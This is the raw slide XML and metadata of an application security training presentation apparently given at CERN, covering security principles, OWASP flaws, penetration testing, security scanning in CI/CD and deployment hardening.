          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>
          </a:soli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2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is a process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156404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D52B1-307A-0446-BA8D-75DB1C36F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357505"/>
            <a:ext cx="8744843" cy="486128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CH" sz="2800" dirty="0"/>
              <a:t>I am protected… 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E8D69B-E3EC-6144-8C97-752D49B2D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91931"/>
            <a:ext cx="2443163" cy="264095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  <a:defRPr/>
            </a:pPr>
            <a:fld id="{6843C2BB-0BC1-4280-9510-6EBE6484FF4A}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 13">
            <a:hlinkClick r:id="rId2"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF808D9F-BD91-3643-8C9A-D7A9863325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101" y="870790"/>
            <a:ext cx="6301680" cy="4111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9D7B455-2E33-FC44-8DB9-1F74D16CAACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3851920" y="2715766"/>
            <a:ext cx="1440160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/>
              <a:t>YES!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75BFE6-D36B-F503-CF2B-4CE643A79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81593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51435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F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conclusions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2A832C-303D-4445-9B37-BBAFCC98B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40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44853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EC253-95EF-3143-BB34-B988BEB31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Take-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>aways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C0DB0-5B95-D14C-9F50-9FBE72C3B1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1800" dirty="0"/>
              <a:t>Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>three golden rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="236538" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Least privilege principle    |    Defense in depth    |    Complexity kills security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1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800" dirty="0"/>
              <a:t>Ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>software security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>– avoid common vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="236538" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken access control   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> |    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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1800" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security analysis tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> – include them in your CI/CD pipelines)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="236538" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>SAST (Static Application Security Testing)    |    Secret detection    |    Dependency scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1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825" dirty="0"/>
              <a:t>Don’t neglect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1825" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deployment security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="236538" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Avoid supply-chain attacks    |    Harden your deployment     |    Protect secrets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1825" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1825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11FCC-3CAC-095D-2AD8-542639911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A37C8E-5D86-6C46-B875-8EE408CB6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41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0117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B946959-A3D5-70D0-C29A-4E76106CFC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199" t="13596" r="-199" b="11404"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-20538"/>
            <a:ext cx="9180512" cy="5164038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F2B64B-3246-2303-27AE-11626ACEE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36512" y="4836920"/>
            <a:ext cx="5768280" cy="255110"/>
          </a:xfrm>
        </p:spPr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CD5B44-499C-E586-C81F-3222C7E13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42</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-F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6F9E5B-40C5-408F-DB62-518B0DB13C7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rgbClr val="0D0D0D">
              <a:alpha val="50196"/>
            </a:srgbClr>
          </a:solidFill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3537807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51435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5DDE8F-6634-BF4D-9CA5-532F52882C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1795" y="1951546"/>
            <a:ext cx="1240408" cy="124040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76FF2E-CA13-64F0-551B-7BF9BC4CD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43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3114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D52B1-307A-0446-BA8D-75DB1C36F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357505"/>
            <a:ext cx="8744843" cy="486128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CH" sz="2800"/>
              <a:t>I am protected… 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E8D69B-E3EC-6144-8C97-752D49B2D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4791931"/>
            <a:ext cx="2443163" cy="264095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  <a:defRPr/>
            </a:pPr>
            <a:fld id="{6843C2BB-0BC1-4280-9510-6EBE6484FF4A}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 13">
            <a:hlinkClick r:id="rId2"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF808D9F-BD91-3643-8C9A-D7A9863325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101" y="870790"/>
            <a:ext cx="6301680" cy="4111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9D7B455-2E33-FC44-8DB9-1F74D16CAACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6958884" y="3245129"/>
            <a:ext cx="2018779" cy="968599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400" b="1" dirty="0"/>
              <a:t>No, not really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B5E04D-F757-5847-B36A-6B4EF2E5C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8639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399FC-89AF-4805-9C07-89849355E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incident in September 2008</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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6FFCC2-724D-CA06-CBB0-6FBAC94BD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37D694-CF66-469D-ECFC-3427C82FA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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 14" descr="Picture1.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8840D7D7-DCCB-B6C5-C672-8A8F34AC5E0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6" y="725092"/>
            <a:ext cx="6061472" cy="4077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6FCCD4AC-9E9F-40E4-C384-E1BB2FD356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371" y="3418164"/>
            <a:ext cx="3889772" cy="1189435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx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21F033C8-A05F-AD78-0ED3-90D999A088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7703" y="3230166"/>
            <a:ext cx="3102769" cy="1472803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx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28745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7D572-EB5A-4E42-A527-7AD1D1DB7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647202-9344-3348-BE75-EF952465D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E8A7595-810D-2040-9EC3-82C8BEC821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7599" y="1059658"/>
            <a:ext cx="4362120" cy="1276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6A1184AC-6EC7-8D47-9EA2-9A342316BC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4" t="12018" r="11611" b="5418"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4916416" y="141480"/>
            <a:ext cx="3760040" cy="4860540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58E9C289-AB0A-9B43-B3D0-5A56E04E5D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042" r="19248"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="354786" y="3256967"/>
            <a:ext cx="7745598" cy="814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3C4DD1-3AFB-1BE7-8FED-99CC12100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4324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BD7E0-1E33-5841-A5E3-C60EDB1B3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7AD508-A45B-5F41-81F8-78466FE0AA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1DDF35-2294-0647-982E-001E1CA9C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38F98B-01B5-664B-A037-C9A29E73B0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8243"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="794873" y="177228"/>
            <a:ext cx="7554254" cy="4789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40999DA-8C46-2547-A73F-4F100F99BF45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3275855" y="2571750"/>
            <a:ext cx="5073271" cy="575573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257175" indent="-257175" algn="ctr" defTabSz="685800" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:sym typeface="Wingdings 2" pitchFamily="18" charset="2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697AEC-B32E-FBA7-C90D-153410815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Sebastian Lopienski – Application security – CSC on IT Services 2024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4100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C4612B-08CF-7B10-B590-1B6CB65DA5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BBC97-E6F0-24E6-3557-A87810054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99" cy="51435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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Three golden rules for system security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1C38EE-458B-57E0-46C8-F46E079A0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43C2BB-0BC1-4280-9510-6EBE6484FF4A}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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7057499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89895</TotalTime>
  <Words>2085</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>330</Paragraphs>
  <Slides>43</Slides>
  <Notes>10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Andale Mono</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Modèle par défaut</vt:lpstr>
      <vt:lpstr>Application security  (Short introduction to best practices  for secure development, testing and deployment) </vt:lpstr>
      <vt:lpstr>A quick dive into application security</vt:lpstr>
      <vt:lpstr>Why?</vt:lpstr>
      <vt:lpstr>I am protected… ?</vt:lpstr>
      <vt:lpstr>I am protected… ?</vt:lpstr>
      <vt:lpstr>An incident in September 2008 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Three golden rules for system security</vt:lpstr>
      <vt:lpstr>Least privilege principle</vt:lpstr>
      <vt:lpstr>Defense in depth (multiple layers of defense)</vt:lpstr>
      <vt:lpstr>Complexity kills security</vt:lpstr>
      <vt:lpstr>Things to avoid </vt:lpstr>
      <vt:lpstr>Three golden rules for system security</vt:lpstr>
      <vt:lpstr>Software security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Top Ten security flaws https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project </vt:lpstr>
      <vt:lpstr>Security flaw #1: Broken Access Control</vt:lpstr>
      <vt:lpstr>Security flaw #3: Injections</vt:lpstr>
      <vt:lpstr>Security flaw #3: Injections</vt:lpstr>
      <vt:lpstr>Security flaw #3: Injections</vt:lpstr>
      <vt:lpstr>Security penetration testing</vt:lpstr>
      <vt:lpstr>A pentester?</vt:lpstr>
      <vt:lpstr>Security penetration testing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Blackbox vs. whitebox testing</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Becoming a white-hat hacker (aka pentester)</vt:lpstr>
      <vt:lpstr>Application security scanning</vt:lpstr>
      <vt:lpstr>Application security scanning</vt:lpstr>
      <vt:lpstr>Various scans / tests toolkits available in GitLab https://docs.gitlab.com/ee/user/application_security </vt:lpstr>
      <vt:lpstr>SAST (Static Application Security Testing) https://docs.gitlab.com/ee/user/application_security/sast </vt:lpstr>
      <vt:lpstr>Secret detection – real life examples </vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Deployment security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Deployment security – a few reminders</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
      <vt:lpstr>Take-aways</vt:lpstr>
      <vt:lpstr>Thank you</vt:lpstr>
      <vt:lpstr> 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Sebastian.Lopienski@cern.ch</dc:creator>
  <cp:lastModifiedBy>Sebastian Lopienski</cp:lastModifiedBy>
  <cp:revision>2517</cp:revision>
  <cp:lastPrinted>2019-10-14T11:48:08Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-01-03T21:50:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-06T11:46:35Z</dcterms:modified>
</cp:coreProperties>
</file>